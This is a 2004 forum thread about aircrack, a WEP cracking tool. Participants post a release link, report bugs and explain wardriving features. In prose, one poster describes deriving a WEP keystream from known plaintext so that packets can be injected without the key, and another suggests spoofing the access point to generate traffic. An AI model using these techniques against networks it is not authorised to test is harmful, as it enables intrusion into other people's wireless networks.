(Aircrack)Yet another WEP cracking tool for Linux - Page 7

sylvain · 08-25-2004

cool ;-)

devine · 08-25-2004

Quote:

Originally Posted by devine

Coming soon

I had fun rewriting airodump, Kismet-style

btw, I'm also on #aircrack (irc.freenode.net)

topolb · 08-25-2004

Quote:

Originally Posted by KoreK

Well in theory, you can. Working on it

Packet reinjection is quite laborious. Let's see if reality sticks to theory...

PS: b0nk, read the forum rules/FAQ before posting.

Well, you are right. You can insert custom packets if you have the keystream derived from a known plaintext attack without knowking the key.

I saw somewhere a tool that implements this

sylvain · 08-25-2004

Quote:

Originally Posted by topolb

Well, you are right. You can insert custom packets if you have the keystream derived from a known plaintext attack without knowking the key.

I saw somewhere a tool that implements this

that could be a good idea to implement it ..

kleptophobiac · 08-25-2004

Quote:

Originally Posted by topolb

Well, you are right. You can insert custom packets if you have the keystream derived from a known plaintext attack without knowking the key.

I saw somewhere a tool that implements this

Would having a known set of data go over the network be a big help?

devine · 08-25-2004

Quote:

Originally Posted by sylvain

Did you release aircrack-1.4 ?

Promises are made to be kept

http://www.cr0.net:8040/code/network/aircrack-1.4.tgz

topolb · 08-26-2004

Quote:

Originally Posted by kleptophobiac

Would having a known set of data go over the network be a big help?

Of course,

In fact you only need a big known (plaintext) packet to be able to create any custom encrypted packet using the same IV and wihout having the key. That is because if you know the plaintext and the cyphertext you can derive the keystream for this specific IV. With this keystream you can encrypt/decrypt anything with this IV.

This way there is no need to crack the key. Only problem is that with one only packet you only can encrypt/decrypt for this IV. For sending packets it is not a problem as the sender is who select the IV. But for decrypting packets you need a known (plaintext) packet for each IV. That's 2^24

It is not so complicated to make this known plain-text. You can for example inject some packet in the wlan from internet (it will be encrypted by the AP), or guess some packet by trafic analysis.

sylvain · 08-26-2004

Quote:

Originally Posted by devine

Promises are made to be kept

http://www.cr0.net:8040/code/network/aircrack-1.4.tgz

cool I ma going to test it right now

sylvain · 08-26-2004

Quote:

Originally Posted by topolb

Of course,

In fact you only need a big known (plaintext) packet to be able to create any custom encrypted packet using the same IV and wihout having the key. That is because if you know the plaintext and the cyphertext you can derive the keystream for this specific IV. With this keystream you can encrypt/decrypt anything with this IV.

This way there is no need to crack the key. Only problem is that with one only packet you only can encrypt/decrypt for this IV. For sending packets it is not a problem as the sender is who select the IV. But for decrypting packets you need a known (plaintext) packet for each IV. That's 2^24

It is not so complicated to make this known plain-text. You can for example inject some packet in the wlan from internet (it will be encrypted by the AP), or guess some packet by trafic analysis.

can we imagine if we have a big known (plaintext paquet) to spoof the IP/MAC address of the access point and to build a crafted broadcast ping encrypted packet ? so that clients with respond to it and generate other encrypted packets...

sylvain · 08-26-2004

Quote:

Originally Posted by sylvain

cool I ma going to test it right now

why is chopper included in aircrack-1.4 ? how do we have to install it (chopper.sh) and use it ...
you should write an INSTALL file ;-)

sylvain · 08-26-2004

Quote:

Originally Posted by sylvain

why is chopper included in aircrack-1.4 ? how do we have to install it (chopper.sh) and use it ...
you should write an INSTALL file ;-)

I found three little bugs in aircrack-1.4
- the displayed SSID is not always good as the length of the SSID can be longer that what aircrack displays..you should use a longer length for the variable.

- it seems that only active networks are shown .. contrary to Kismet, you don't show previous discovered AP which are not active...

- I could not leave airodump in a proper way

devine · 08-26-2004

Quote:

Originally Posted by sylvain

Why is chopper included in aircrack-1.4 ?

The SSID can be longer that what aircrack displays

It seems that only active networks are shown

I could not leave airodump in a proper way

* chopper.sh is actually a channel hopper script you can use together with airodump when wardriving.

* The essid is truncated to 20 characters to fit in a 80 column display. Indeed, when the window size is larger the full essid (32 bytes) can be displayed. I've added this in my TODO list.

* After 2mn of inactivity, the discovered APs are hidden; this feature is especially helpful when wardriving. Note that when you exit airodump, it saves the complete list of detected Access Points in CSV format.

* airodump detects when the user presses Ctrl-C and exits gracefully.

sylvain · 08-26-2004

Quote:

Originally Posted by devine

* chopper.sh is actually a channel hopper script you can use together with airodump when wardriving.

* The essid is truncated to 20 characters to fit in a 80 column display. Indeed, when the window size is larger the full essid (32 bytes) can be displayed. I've added this in my TODO list.

* After 2mn of inactivity, the discovered APs are hidden; this feature is especially helpful when wardriving. Note that when you exit airodump, it saves the complete list of detected Access Points in CSV format.

* airodump detects when the user presses Ctrl-C and exits gracefully.

Hum I made a Crtl-C and airodump did not exit .. I had to close my terminal window..oterwise when I exited I only had a pcap file created and no csv file...

devine · 08-26-2004

Quote:

Originally Posted by sylvain

Hum I made a Crtl-C and airodump did not exit .. I had to close my terminal window..oterwise when I exited I only had a pcap file created and no csv file...

Right, this almost certainly happened because airodump was waiting for a packet in read(), thus not checking the do_exit flag; I'll put back the select() call so as to check do_exit regularly. Thanks for reporting this bug

sylvain · 08-26-2004

Quote:

Originally Posted by sylvain

can we imagine if we have a big known (plaintext paquet) to spoof the IP/MAC address of the access point and to build a crafted broadcast ping encrypted packet ? so that clients with respond to it and generate other encrypted packets...

and what do you think of what I said earlier devine ?

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

08-25-2004	#91 (permalink)
sylvain Wireless Auditor Join Date: Jun 2004 Location: Paris, France Posts: 175	cool ;-)